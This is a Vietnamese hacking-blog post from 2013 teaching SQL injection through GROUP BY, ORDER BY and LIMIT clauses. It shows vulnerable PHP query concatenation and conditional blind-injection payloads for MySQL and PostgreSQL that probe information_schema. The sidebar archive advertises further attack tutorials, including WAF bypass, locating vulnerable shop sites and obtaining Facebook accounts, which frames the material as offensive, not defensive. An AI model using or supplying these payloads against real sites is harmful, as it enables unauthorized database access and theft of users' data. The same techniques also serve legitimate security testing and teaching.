My Banner
Link Sahabat
Forum
- local attack (1)
- new (1)
- sql injection (36)
- tài liệu IT (1)
- Trick Blogger (1)
- Trick facebook (9)
Benner Friends
abc
Blog Archive
-
▼
2013
(50)
-
▼
tháng 12
(36)
- tut 406
- tut ko có use và admin
- tut check sql sài lệnh mid 100,1000(sql nang cao)
- tut xpath (sql nang cao)
- tut thêm =-1148952776'
- tut SQL injection dạng HTML
- Một số cách kiếm acc facebook
- Hướng dẫn cách lấy toàn bộ bài viết từ blog khác
- các lệnh local
- Khai thác Error Based - Quick Blind
- MỘT SỐ LƯU Ý KHI KHAI THÁC SQL
- các dạng tut check sql
- Một số cách Bypass SQL injection
- [TUT] Hack SQLi Injection Căn Bản Cho NewBie
- [TUT] Hack SQLi Injection Căn Bản Cho NewBie
- Từ dễ đến khó "Bypass WAF"
- [TUT] Bypass Filter + 403 Forbidden SQL Injection
- Advanced - Jet SQL
- Advanced - Blind SQL
- Advanced - Blind SQL
- Advanced - Group by,Order by,Limit
- Advanced - Bypass SQL injection
- Advanced - Bypass SQL injection
- Advanced - Blind SQL
- Advanced - MySQL Blind SQL Cheat Sheets
- Basic - MySQL injection
- Basic - lỗi SQL id=?' cat=?' - part 2
- Basic - lỗi SQL id=?' cat=?' Tìm Shop lỗi
- Basic - lỗi SQL id=?' cat=?' Tìm Shop lỗi
- Basic - Unable to run Query
- tut hướng dẫn check sql bang html
- tổng hợp các link hack site
- Tut SQL Base64 encode/decode
- TUT ko co user va admin tim kiem member
- --------------error base------------
- tut tb_user
-
▼
tháng 12
(36)
Được tạo bởi Blogger.
Translate
Chủ Nhật, 22 tháng 12, 2013
Advanced - Group by,Order by,Limit
GROUP BY
vd :đối với MySQL
Code:
"SELECT id, name FROM users GROUP BY "
. $_GET['id']
ta có thể biến đổi như sau
Code:
SELECT id, name FROM users GROUP BY 1,
(SELECT (CASE WHEN (điều kiện) THEN 1 ELSE
1*(SELECT table_name FROM
information_schema.tables) END))
ORDER BY
vd: đối với PostgreSQL
Code:
"SELECT id, name FROM users ORDER BY "
. $_GET['id']
thành
Code:
SELECT id, name FROM users ORDER BY 1,
(SELECT (CASE WHEN (điều kiện) THEN 1 ELSE
1/0 END))
LIMIT
vd: đối với MySQL
Code:
"SELECT id, name FROM users LIMIT 0, "
. $_GET['id']
thành
Code:
SELECT id, name FROM users LIMIT 0, 1
UNION ALL SELECT (CASE WHEN (điều kiện)
THEN 1 ELSE 1*(SELECT table_name FROM
information_schema.tables) END), NULL
Nhãn:
sql injection
Đăng ký:
Đăng Nhận xét (Atom)
Giới thiệu bản thân
Join My Group
webcom
Translators
Statistik
Follow
noo
no
Gunakan Google Chrome Untuk Mendapatkan Tampilan Terbaik Blog Ini ( ^_^ )